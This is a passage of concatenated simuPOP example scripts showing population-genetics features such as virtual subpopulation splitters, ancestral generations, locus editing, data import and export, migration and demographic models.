females\npop.setIndInfo([sim.MALE], 'Sex', [0, 0])\npop.setIndInfo([sim.FEMALE], 'Sex', [0, 1])\n# Print individual genotypes, followed by values at information field Sex\nsim.dump(pop, structure=False)\n#end_file\n\n\n#begin_file log/advancedVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[2000, 4000], loci=[30], infoFields='x')\n# assign random information fields\nsim.initSex(pop)\nsim.initInfo(pop, lambda: random.randint(0, 3), infoFields='x')\n#\n# 1, use a combined splitter\npop.setVirtualSplitter(sim.CombinedSplitter(splitters = [\n sim.SexSplitter(),\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])\n]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE\npop.subPopSize([1, 4]) # individuals in sp 1 with value 2 at field x\n#\n# use a product splitter that defines additional VSPs by sex and info\npop.setVirtualSplitter(sim.ProductSplitter(splitters = [\n sim.SexSplitter(names=['M', 'F']), # give a new set of names\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])\n]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE with value 1 in sp 0\npop.subPopSize([1, 5]) # sim.FEMALE with value 1 in sp 1\n#\n# use a combined splitter to join VSPs defined by a\n# product splitter\npop.setVirtualSplitter(sim.CombinedSplitter([\n sim.ProductSplitter([\n sim.SexSplitter(),\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])])],\n vspMap = [[0,1,2], [4,5,6], [7]],\n names = ['Male x<=3', 'Female x<=3', 'Female x=4']))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE with value 0, 1, 2 at field x\npop.subPopSize([1, 1]) # sim.FEMALE with value 0, 1 or 2 at field x\n#end_file\n\n\n#begin_file log/accessIndividual.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create a sim.population with two generations. The current generation has values\n# 0-9 at information field x, the parental generation has values 10-19.\npop = sim.Population(size=[5, 5], loci=[2, 3], infoFields='x', ancGen=1)\npop.setIndInfo(range(10, 20), 'x')\npop1 = pop.clone()\npop1.setIndInfo(range(10), 'x')\npop.push(pop1)\n#\nind = pop.individual(5) # using absolute index\nind.x\nind.x # the same as ind.x\n# use a for loop, and relative index\nfor idx in range(pop.subPopSize(1)):\n print(pop.individual(idx, 1).x)\n\n# It is usually easier to use an iterator\nfor ind in pop.individuals(1):\n print(ind.x)\n\n# Access individuals in VSPs\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=[3, 7, 17], field='x'))\nfor ind in pop.individuals([1, 1]):\n print(ind.x)\n\n# Access all individuals in all ancestral generations\nprint([ind.x for ind in pop.allIndividuals()])\n# or only specified subpopulations or ancestral generations\nprint([ind.x for ind in pop.allIndividuals(subPops=[(0,2), (1,3)], ancGens=1)])\n\n# Access individuals in ancetral generations\npop.ancestor(5, 1).x # absolute index\npop.ancestor(0, 1, 1).x # relative index\n# Or make ancestral generation the current generation and use 'individual'\npop.useAncestralGen(1)\npop.individual(5).x # absolute index\npop.individual(0, 1).x # relative index\n# 'ancestor' can still access the 'present' (generation 0) generation\npop.ancestor(5, 0).x\n# access individual by ID\npop.addInfoFields('ind_id')\nsim.tagID(pop)\n[int(ind.ind_id) for ind in pop.individuals()]\n# access individual by ID. Note that individual 12 is in the parental generation\npop.indByID(12).x\n#end_file\n\n#begin_file log/batchAccess.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[4, 6], loci=2, infoFields='x')\npop.setIndInfo([random.randint(0, 10) for x in range(10)], 'x')\npop.indInfo('x')\npop.setGenotype([0, 1, 2, 3], 0)\npop.genotype(0)\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=[3], field='x'))\npop.setGenotype([0]) # clear all values\npop.setGenotype([5, 6, 7], [1, 1])\npop.indInfo('x', 1)\npop.genotype(1)\n#end_file\n\n#begin_file log/popInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10)\npop.setInfoFields(['a', 'b'])\npop.addInfoFields('c')\npop.addInfoFields(['d', 'e'])\npop.infoFields()\n#\n# information fields can be accessed in batch mode\npop.setIndInfo([1], 'c')\n# as well as individually.\nfor ind in pop.individuals():\n ind.e = ind.c + 1\n\nprint(pop.indInfo('e'))\n#end_file\n\n#begin_file log/ancestralPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(500, loci=1, ancGen=2)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme = sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, begin=-3),\n sim.PyEval(r\"'%.3f\\n' % alleleFreq[0][0]\", begin=-3)\n ],\n gen = 20\n)\n# information\npop.ancestralGens()\npop.popSize(ancGen=1)\npop.setVirtualSplitter(sim.SexSplitter())\n# number of males in the current and parental generation\npop.subPopSize((0,0)), pop.subPopSize((0,0), ancGen=1)\n# start from current generation\nfor i in range(pop.ancestralGens(), -1, -1):\n pop.useAncestralGen(i)\n sim.stat(pop, alleleFreq=0)\n print('%d %.3f' % (i, pop.dvars().alleleFreq[0][0]))\n\n# restore to the current generation \npop.useAncestralGen(0) \n#end_file\n\n#begin_file log/addRemoveLoci.py\nimport simuOpt\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nsimuOpt.setOptions(debug='DBG_WARNING')\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, loci=3, chromNames=['chr1'])\n# 1 1 1, \npop.setGenotype([1])\n# 1 1 1, 0 0 0\npop.addChrom(lociPos=[0.5, 1, 2], lociNames=['rs1', 'rs2', 'rs3'],\n chromName='chr2')\npop1 = sim.Population(10, loci=3, chromNames=['chr3'],\n lociNames=['rs4', 'rs5', 'rs6'])\n# 2 2 2,\npop1.setGenotype([2])\n# 1 1 1, 0 0 0, 2 2 2\npop.addChromFrom(pop1)\n# 1 1 1, 0 0 0, 2 0 2 2 0\npop.addLoci(chrom=[2, 2], pos=[1.5, 3.5], lociNames=['rs7', 'rs8'])\n# 1 1 1, 0 0 0, 2 0 2 0\npop.removeLoci(8)\n# loci names can also be used.\npop.removeLoci(['rs1', 'rs7'])\nsim.dump(pop)\n# add loci from another population \npop2 = sim.Population(10, loci=2, lociPos=[0.1, 2.2], chromNames='chr3')\npop.addLociFrom(pop2)\npop.addLociFrom(pop2, byName=2)\nsim.dump(pop, genotype=False)\n#end_file\n\n#begin_file log/recode.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5, loci=[5], alleleNames=['A', 'T', 'C', 'G'])\nsim.initGenotype(pop, freq=[0.2, 0.3, 0.4, 0.1])\nsim.dump(pop, structure=False)\nprint(pop.genotype())\npop.recodeAlleles([0, 3, 1, 2], alleleNames=['A', 'C', 'G', 'T'])\nsim.dump(pop, structure=False)\nprint(pop.genotype())\n#end_file\n\n#begin_file log/extract.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[200, 200], loci=[5, 5], infoFields='age')\nsim.initGenotype(pop, genotype=range(10))\nsim.initInfo(pop, lambda: random.randint(0,75), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[20, 60]))\n# remove individuals\npop.removeIndividuals(indexes=range(0, 300, 10))\nprint(pop.subPopSizes())\n# remove individuals using IDs\npop.setIndInfo([1, 2, 3, 4], field='age')\npop.removeIndividuals(IDs=[2, 4], idField='age')\n# remove indiviuals using a filter function\nsim.initSex(pop)\npop.removeIndividuals(filter=lambda ind: ind.sex() == sim.MALE)\nprint([pop.individual(x).sex() for x in range(8)])\n#\n# remove subpopulation\npop.removeSubPops(1)\nprint(pop.subPopSizes())\n# remove virtual subpopulation (people with age between 20 and 60)\npop.removeSubPops([(0, 1)])\nprint(pop.subPopSizes())\n# extract another virtual subpopulation (people with age greater than 60)\npop1 = pop.extractSubPops([(0,2)])\nsim.dump(pop1, structure=False, max=10)\n#end_file\n\n\n#begin_file log/popVars.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom pprint import pprint\npop = sim.Population(100, loci=2)\nsim.initGenotype(pop, freq=[0.3, 0.7])\nprint(pop.vars()) # No variable now\npop.dvars().myVar = 21\nprint(pop.vars())\nsim.stat(pop, popSize=1, alleleFreq=0)\n# pprint prints in a less messy format\npprint(pop.vars())\n# print number of allele 1 at locus 0\nprint(pop.vars()['alleleNum'][0][1])\n# use the dvars() function to access dictionary keys as attributes\nprint(pop.dvars().alleleNum[0][1])\nprint(pop.dvars().alleleFreq[0])\n#end_file\n\n#begin_file log/expression.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=1), rep=5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme = sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TerminateIf('len(alleleFreq[0]) == 1')\n ]\n)\n#end_file\n\n#begin_file log/savePop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=5, chromNames=['chrom1'])\npop.dvars().name = 'my sim.Population'\npop.save('sample.pop')\npop1 = sim.loadPopulation('sample.pop')\npop1.chromName(0)\npop1.dvars().name\n#begin_ignore\nimport os\nos.remove('sample.pop')\n#end_ignore\n#end_file\n\n\n\n#begin_file log/importExport.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.utils import importPopulation, export\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2,4], loci=5, lociNames=['a1', 'a2', 'a3', 'a4', 'a5'],\n infoFields='BMI')\nsim.initGenotype(pop, freq=[0.3, 0.5, 0.2])\nsim.initSex(pop)\nsim.initInfo(pop, [20, 30, 40, 50, 30, 25], infoFields='BMI')\nexport(pop, format='fstat', output='fstat.txt')\nprint(open('fstat.txt').read())\nexport(pop, format='structure', phenotype='BMI', output='stru.txt')\nprint(open('stru.txt').read())\npop1 = importPopulation(format='fstat', filename='fstat.txt')\nsim.dump(pop1)\n#begin_ignore\nimport os\nos.remove('fstat.txt')\nos.remove('stru.txt')\n#end_ignore\n#end_file\n\n#begin_file log/importMS.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.utils import importPopulation, export\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([20,20], loci=[10, 10])\n# simulate a population but mutate only a subset of loci\npop.evolve(\n preOps=[\n sim.InitSex(),\n sim.SNPMutator(u=0.1, v=0.01, loci=range(5, 17))\n ],\n matingScheme=sim.RandomMating(),\n gen=100\n)\n# export first chromosome, all individuals\nexport(pop, format='ms', output='ms.txt')\n# export first chromosome, subpops as replicates\nexport(pop, format='ms', output='ms_subPop.txt', splitBy='subPop')\n# export all chromosomes, but limit to all males in subPop 1\npop.setVirtualSplitter(sim.SexSplitter())\nexport(pop, format='ms', output='ms_chrom.txt', splitBy='chrom', subPops=[(1,0)])\n# \nprint(open('ms_chrom.txt').read())\n# import as haploid sequence\npop = importPopulation(format='ms', filename='ms.txt')\n# import as diploid \npop = importPopulation(format='ms', filename='ms.txt', ploidy=2)\n# import as a single chromosome\npop = importPopulation(format='ms', filename='ms_subPop.txt', mergeBy='subPop')\n#begin_ignore\nimport os\nos.remove('ms.txt')\nos.remove('ms_subPop.txt')\nos.remove('ms_chrom.txt')\n#end_ignore\n#end_file\n\n#begin_file log/applicableGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[20])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.8, 0.2])\n ],\n preOps=[\n sim.PyEval(r\"'At the beginning of gen %d: allele Freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n at = [-10, -1])\n ],\n matingScheme = sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, begin=80, step=10),\n sim.PyEval(r\"'At the end of gen %d: allele freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n begin=80, step=10),\n sim.PyEval(r\"'At the end of gen %d: allele Freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n at = [-10, -1])\n ],\n finalOps=sim.SavePopulation(output='sample.pop'),\n gen=100\n)\n#begin_ignore\nimport os\nos.remove('sample.pop')\n#end_ignore\n#end_file\n\n#begin_file log/replicate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=[20]), 5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval('gen', step=10, reps=0),\n sim.PyEval(r\"'\\t%.2f' % alleleFreq[0][0]\", step=10, reps=(0, 2, -1)),\n sim.PyOutput('\\n', step=10, reps=-1)\n ],\n gen=30,\n)\n#end_file\n\n#begin_file log/dynamicLoci.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[10], infoFields='fitness')\n\ndef mostPopular(pop):\n sim.stat(pop, alleleFreq=sim.ALL_AVAIL)\n freq = [pop.dvars().alleleFreq[x][1] for x in range(pop.totNumLoci())]\n max_freq = max(freq)\n pop.dvars().selLoci = (freq.index(max_freq), max_freq)\n return [freq.index(max_freq)]\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.6, 0.4]),\n ],\n preOps=[\n sim.MaSelector(fitness=[1, 0.9, 0.8], loci=mostPopular),\n sim.PyEval(r\"'gen=%d, select against %d with frequency %.2f\\n' % (gen, selLoci[0], selLoci[1])\"),\n ],\n matingScheme=sim.RandomMating(),\n gen=10,\n)\n#end_file\n\n\n\n#begin_file log/output.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=1000, loci=2), rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme = sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1]),\n sim.PyEval(r\"'%.2f\\t' % LD[0][1]\", step=20, output='>>LD.txt'),\n sim.PyOutput('\\n', reps=-1, step=20, output='>>LD.txt'),\n sim.PyEval(r\"'%.2f\\t' % R2[0][1]\", output='R2.txt'),\n sim.PyEval(r\"'%.2f\\t' % LD[0][1]\", step=20, output=\"!'>>LD_%d.txt' % rep\"),\n ],\n gen=100\n)\nprint(open('LD.txt').read())\nprint(open('R2.txt').read()) # Only the last write operation succeed.\nprint(open('LD_2.txt').read()) # Each replicate writes to a different file.\n#begin_ignore\nimport os\nfor file in ['LD.txt', 'LD_0.txt', 'LD_1.txt', 'LD_2.txt', 'R2.txt']:\n os.remove(file)\n\n#end_ignore\n#end_file\n\n#begin_file log/outputFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport logging\n# logging to a file simulation.log, with detailed debug information\nlogging.basicConfig(\n filename='simulation.log',\n level=logging.DEBUG,\n format='%(levelname)s: %(message)s',\n filemode='w'\n)\nformatter = logging.Formatter('%(message)s')\nlogger = logging.getLogger('')\npop = sim.Population(size=1000, loci=2)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme = sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1]),\n sim.PyEval(r\"'LD: %d, %.2f' % (gen, LD[0][1])\", step=20,\n output=logger.info), # send LD to console and a logfile\n sim.PyEval(r\"'R2: %d, %.2f' % (gen, R2[0][1])\", step=20,\n output=logger.debug), # send R2 only to a logfile\n ],\n gen=100\n)\nprint(open('simulation.log').read())\n#begin_ignore\nlogging.shutdown()\nimport os\nos.remove('simulation.log')\n#end_ignore\n#end_file\n\n#begin_file log/transmitter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=2)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme = sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(end=29),\n sim.Recombinator(rates=0.01, begin=30),\n ]),\n postOps=[\n sim.Stat(LD=[0, 1]),\n sim.PyEval(r\"'gen %d, LD: %.2f\\n' % (gen, LD[0][1])\", step=20)\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/hybrid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef myPenetrance(geno):\n 'A three-locus heterogeneity penetrance model'\n if sum(geno) < 2:\n return 0\n else:\n return sum(geno)*0.1\n\npop = sim.Population(1000, loci=[20]*3)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.8, 0.2])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.PyPenetrance(func=myPenetrance, loci=[10, 30, 50]),\n sim.Stat(numOfAffected=True),\n sim.PyEval(r\"'%d: %d\\n' % (gen, numOfAffected)\")\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/PyOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef dynaMutator(pop, param):\n '''This mutator mutates commom loci with low mutation rate and rare\n loci with high mutation rate, as an attempt to raise allele frequency\n of rare loci to an higher level.'''\n # unpack parameter\n (cutoff, mu1, mu2) = param;\n sim.stat(pop, alleleFreq=range(pop.totNumLoci()))\n for i in range(pop.totNumLoci()):\n # Get the frequency of allele 1 (disease allele)\n if pop.dvars().alleleFreq[i][1] < cutoff:\n sim.kAlleleMutate(pop, k=2, rates=mu1, loci=[i])\n else:\n sim.kAlleleMutate(pop, k=2, rates=mu2, loci=[i])\n return True\n\npop = sim.Population(size=10000, loci=[2, 3])\npop.evolve(\n initOps=[ \n sim.InitSex(),\n sim.InitGenotype(freq=[.99, .01], loci=[0, 2, 4]),\n sim.InitGenotype(freq=[.8, .2], loci=[1, 3])\n ],\n preOps=sim.PyOperator(func=dynaMutator, param=(.2, 1e-2, 1e-5)),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(5), step=10),\n sim.PyEval(r\"' '.join(['%.2f' % alleleFreq[x][1] for x in range(5)]) + '\\n'\",\n step=10),\n ],\n gen = 31\n) \n#end_file\n\n#begin_file log/pyDuringMatingOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef rejectInd(off):\n 'reject an individual if it off.allele(0) == 1'\n return off.allele(0) == 0\n\npop = sim.Population(size=100, loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyOperator(func=rejectInd)\n ]),\n gen = 1\n)\n# You should see no individual with allele 1 at locus 0, ploidy 0.\npop.genotype()[:20]\n#end_file\n\n#begin_file log/funcform.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import InitGenotype, Population\n#begin_ignore\nfrom simuPOP import setRNG\nsetRNG(seed=12345)\n#end_ignore\ndef initGenotype(pop, *args, **kwargs):\n InitGenotype(*args, **kwargs).apply(pop)\n\npop = Population(1000, loci=[2,3])\ninitGenotype(pop, freq=[.2, .3, .5])\n#end_file\n\n#begin_file log/migrSize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/migrFixedSize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n matingScheme=sim.RandomMating(subPopSize=[500, 1000]),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/demoBySelection.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(pop):\n return int(pop.popSize() * 1.05)\n\npop = sim.Population(size=10000, loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.7, 0.3])\n ],\n preOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%d %s --> \" % (gen, subPopSize)'),\n sim.ResizeSubPops(0, proportions=[0.5], at=2),\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.2, 0.6], begin=4),\n sim.DiscardIf('ind.affected()', exposeInd='ind', begin=4),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s --> \" % subPopSize'),\n ],\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 6\n)\n#end_file\n\n#begin_file log/demoFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen):\n return [500 + gen*10, 1000 + gen*10]\n\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/demoFunc1.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef demo(pop):\n return [x + random.randint(50, 100) for x in pop.subPopSizes()]\n\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n\n#begin_file log/advancedDemoFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen, pop):\n if gen < 2:\n return 1000 + 100 * gen\n if gen == 2:\n # this happens right before mating at generation 2\n size = pop.popSize()\n pop.splitSubPop(0, [size // 2, size - size//2]) \n # for generation two and later\n return [x + 50 * gen for x in pop.subPopSizes()]\n\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s (before mating)\\t\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s (after mating)\\n\" % subPopSize')\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/numOff.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef checkNumOffspring(numOffspring, ops=[]):\n '''Check the number of offspring for each family using\n information field father_idx\n '''\n pop = sim.Population(size=[30], loci=1, infoFields=['father_idx', 'mother_idx'])\n pop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ] + ops,\n numOffspring=numOffspring),\n gen=1)\n # get the parents of each offspring\n parents = [(x, y) for x, y in zip(pop.indInfo('mother_idx'),\n pop.indInfo('father_idx'))]\n # Individuals with identical parents are considered as siblings.\n famSize = []\n lastParent = (-1, -1)\n for parent in parents:\n if parent == lastParent:\n famSize[-1] += 1\n else:\n lastParent = parent\n famSize.append(1)\n return famSize\n\n# Case 1: produce the given number of offspring\ncheckNumOffspring(numOffspring=2)\n# Case 2: Use a Python function\nimport random\ndef func(gen):\n return random.randint(5, 8)\n\ncheckNumOffspring(numOffspring=func)\n# Case 3: A geometric distribution\ncheckNumOffspring(numOffspring=(sim.GEOMETRIC_DISTRIBUTION, 0.3))\n# Case 4: A Possition distribution\ncheckNumOffspring(numOffspring=(sim.POISSON_DISTRIBUTION, 1.6))\n# Case 5: A Binomial distribution\ncheckNumOffspring(numOffspring=(sim.BINOMIAL_DISTRIBUTION, 0.1, 10))\n# Case 6: A uniform distribution\ncheckNumOffspring(numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 6))\n# Case 7: With selection on offspring\ncheckNumOffspring(numOffspring=8,\n ops=[sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.8, (1,1):0.5})])\n#end_file\n\n\n\n#begin_file log/dynamicNumOff.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nimport random\n\nclass RandomNumOff:\n # a demographic model\n def __init__(self):\n self.numOff = []\n \n def getNumOff(self):\n # return the pre-simulated number of offspring as a generator function\n for item in self.numOff:\n yield item\n \n def __call__(self, pop):\n # define __call__ so that a RandomNumOff object is callable.\n #\n # Each male produce from 1 to 3 offspring. For large population, get the\n # number of males instead of checking the sex of each individual\n self.numOff = [random.randint(1, 3) for ind in pop.individuals() if ind.sex() == sim.MALE]\n # return the total population size\n print('{} mating events with number of offspring {}'.format(len(self.numOff), self.numOff))\n return sum(self.numOff)\n\n\npop = sim.Population(10)\n\n# create a demogranic model\nnumOffModel = RandomNumOff()\n\npop.evolve(\n preOps=sim.InitSex(),\n matingScheme=sim.RandomMating(\n # the model will be called before mating to deteremine\n # family and population size\n subPopSize=numOffModel,\n # the getNumOff function (generator) returns number of offspring\n # for each mating event\n numOffspring=numOffModel.getNumOff\n ),\n 